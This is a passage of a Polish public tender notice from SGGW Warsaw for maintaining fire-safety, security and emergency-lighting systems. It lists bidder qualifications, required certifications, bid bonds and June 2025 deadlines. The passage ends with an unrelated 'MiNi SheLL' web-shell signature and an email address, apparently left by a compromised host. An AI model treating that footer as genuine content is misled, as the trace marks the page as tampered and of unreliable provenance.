podlegają wykluczeniu;<br/>11<br/>2) ·spełniają niżej określone warunki udziału w postępowaniu.<br/>2. Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów;<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów:<br/> Za spełnienie ww. warunku Zamawiający uzna wykazanie się przez Wykonawcę<br/>posiadaniem aktualnej koncesji Ministra Spraw Wewnętrznych i Administracji w zakresie<br/>usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego,<br/>zgodnie z art. 15 Ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz.U. z 2021 r.<br/>poz. 1995 ze zm.). W przypadku Wykonawców ubiegających się wspólnie o zamówienie<br/>warunek musi spełnić każdy z Wykonawców. – Dotyczy części II<br/>3) sytuacji ekonomicznej lub finansowej;<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą się posiadaniem<br/>aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej:<br/> część I – 250 000,00 złotych<br/> część II – 250 000,00 złotych<br/> część III – 70 000,00 złotych<br/>4) zdolności technicznej lub zawodowej:<br/>1) Za spełnienie tego warunku Zamawiający uzna wykazanie, że Wykonawca w okresie<br/>ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy to w tym okresie, należycie zrealizował co najmniej 2 (dwie) usługi o podobnym<br/>charakterze, co usługi stanowiące przedmiot zamówienia:<br/>a) dla Części I - konserwacja w okresie 12 m-cy systemów SSP, oddymiania, Gazex i DSO w<br/>obiektach Szkoły Głównej Gospodarstwa Wiejskiego w Warszawie,<br/>Za usługi o podobnym charakterze Zamawiający uzna wykonanie co najmniej 2 (dwie) usługi<br/>konserwacyjne, których wartość brutto jest nie mniejsza niż 300 000,00 zł każda, oraz obejmuje w<br/>szczególności konserwacje systemów:<br/>a. sygnalizacji ppoż.,<br/>b. DSO;<br/>c. wykrywania gazu;<br/>d. system oddymiania;<br/>e. system SUG.<br/>b) dla Części II - konserwacja w okresie 12 m-cy systemów ochrony mienia obiektach Szkoły<br/>Głównej Gospodarstwa Wiejskiego w Warszawie,<br/>Za usługi o podobnym charakterze Zamawiający uzna wykonanie co najmniej 2 (dwie) usługi<br/>konserwacyjne, której wartość brutto jest nie mniejsza niż 300 000,00 zł każda, oraz obejmuje w<br/>szczególności konserwacje systemów:<br/>a. system telewizji dozorowej (CCTV);<br/>b. system sygnalizacji włamania i napadu (SSWiN);<br/>c. system kontroli dostępu (SKD);<br/>12<br/>d. platforma integrująca systemy bezpieczeństwa (PSIM).<br/>c) dla Części III - Konserwacja w okresie 12 miesięcy systemów oświetlenia awaryjnego i<br/>ewakuacyjnego w obiektach Szkoły Głównej Gospodarstwa Wiejskiego w Warszawie,<br/>Za usługi o podobnym charakterze Zamawiający uzna wykonanie co najmniej 2(dwie) usługi<br/>konserwacyjne, której wartość brutto jest nie mniejsza niż 70 000,00 zł za każdą, oraz obejmuje w<br/>szczególności konserwacje systemów:<br/>a. oświetlenia awaryjnego<br/>b. oświetlenia ewakuacyjnego<br/>2) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, iż dysponują i<br/>w trakcie zamówienia dysponować będą, na potrzeby jego prawidłowej realizacji odpowiednio<br/>wykwalifikowanymi osobami posiadającymi kwalifikacje jak niżej:<br/>a) zaświadczenie TECHOM lub PISA w zakresie instalowania i konserwacji systemów<br/>zabezpieczeń technicznych stopni 1-4/NO – min. 5 osób - dotyczy części II zamówienia,<br/>b) aktualną licencję pracownika ochrony technicznej II stopnia lub aktualne zaświadczenie<br/>o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego – min. 5<br/>osób – dotyczy części II zamówienia,<br/>c) świadectwo kwalifikacyjne w zakresie eksploatacji urządzeń z grupy I np. SEP lub<br/>równoważne:<br/> „E” – uprawniające do eksploatacji urządzeń będących pod napięciem oraz<br/>wykonywania pomiarów ochrony przeciwporażeniowej – min. 5 osoby,<br/> „D” – uprawniające do dozoru nad eksploatacją urządzeń będących pod napięciem -<br/>min. 2 osoby,<br/>– dotyczy części I, II, III zamówienia,<br/>d) Aktualne świadectwa odbytych szkoleń w zakresie uprawniającym do obsługi i<br/>konserwacji zainstalowanych systemów:<br/> SSP – Polon-Alfa – Polon 4000, Polon 6000;<br/> SSP – Schrack-Seconet – Integral IP, EvoxX;<br/> SSP – Siemens – Cerberus PRO;<br/> SSP – Bosch – systemy sygnalizacji pożarowej;<br/> DSO – Bosch – Praesideo;<br/> DSO – Ambinet;<br/> Oddymianie – D+H;<br/> Oddymianie – UCS6000;<br/> Detekcja gazu – Gazex;<br/> PSIM – IFTER EQU2.<br/>min. 2 osoby – dotyczy części I zamówienia,<br/> Certyfikat CNBOP ukończenia szkolenia w zakresie instalacji i konserwacji<br/>systemów sygnalizacji pożarowej;<br/>min. 1 osoba – dotyczy części I zamówienia,<br/>e) Aktualne świadectwa odbytych szkoleń w zakresie uprawniającym do obsługi i<br/>konserwacji zainstalowanych systemów:<br/> CCTV – Hikvision;<br/> CCTV – Novus;<br/> CCTV – VDG Sense;<br/> SSWiN – Satel;<br/> SSWiN – Galaxy Dimension;<br/>13<br/> SKD – Roger RACS5;<br/> SKD – Kantech;<br/> SKD – iProtect;<br/> PSIM – WinGuard;<br/> PSIM – IFTER EQU2;<br/>min. 2 osoby – dotyczy części II zamówienia.<br/>Funkcje/uprawnienia wskazane powyżej można ze sobą łączyć. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>(wzór załącznik nr 10 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu (załącznik nr 1 i 2 do SWZ) w zakresie wskazanym w rozdziale IX i X<br/>SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane, na<br/>wezwanie, podmiotowe środki dowodowe, wskazane w ust. 4 i 5.<br/>2. Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>elektronicznym podpisem osobistym.<br/>3. Oświadczenie składają odrębnie:<br/> wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu;<br/> podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>podmiot udostępnia swoje zasoby wykonawcy;<br/>4. Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia, następujących podmiotowych środków dowodowych:<br/>1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej:<br/> aktualną koncesję na wykonywanie działalności gospodarczej w zakresie ochrony osób i mienia<br/>realizowanych w formie usług zabezpieczenia technicznego – dot. części II rozdział IX pkt 2. 2)<br/>a) SWZ);<br/>2) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących sytuacji ekonomicznej lub finansowej:<br/> dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze<br/>wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>3) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących zdolności technicznej lub zawodowej:<br/> wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>17<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich<br/>3 miesięcy – (wzór załącznik nr 8 do SWZ);<br/> wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami - (wzór załącznik nr 9 do SWZ);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> amawiający wymaga wniesienia wadium<br/>1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania<br/>ofert, wnieść wadium w kwocie:<br/>a. część I – 6 000.00 PLN (słownie: sześć tysięcy złotych 00/100),<br/>b. część II – 5 000.00 PLN (słownie: pięć tysięcy złotych 00/100),<br/>c. część III – 2 000,00 PLN (słownie: dwa tysiące złotych 00/100)<br/>2) Wadium musi obejmować pełen okres związania ofertą.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp tj.:<br/>- pieniądzu,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310,<br/>836 i 1562 ze zm.).<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku:<br/>Bank PEKAO S.A., numer rachunku 77 1240 6003 1111 0000 4942 8931.<br/>4)Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem<br/>terminu składania ofert.<br/>21<br/>Uwaga! Terminem wniesienia wadium w formie pieniężnej jest data i godzina zaksięgowania kwoty<br/>wadium na koncie Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>publicznego, dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy z<br/>Wykonawców oddzielnie. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje dokonanie zmian postanowień treści zawartej Umowy w przypadku<br/>zaistnienia następujących okoliczności: Zgodnie z §12 wzoru Umowy stanowiącym załącznik nr 5 do<br/>SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com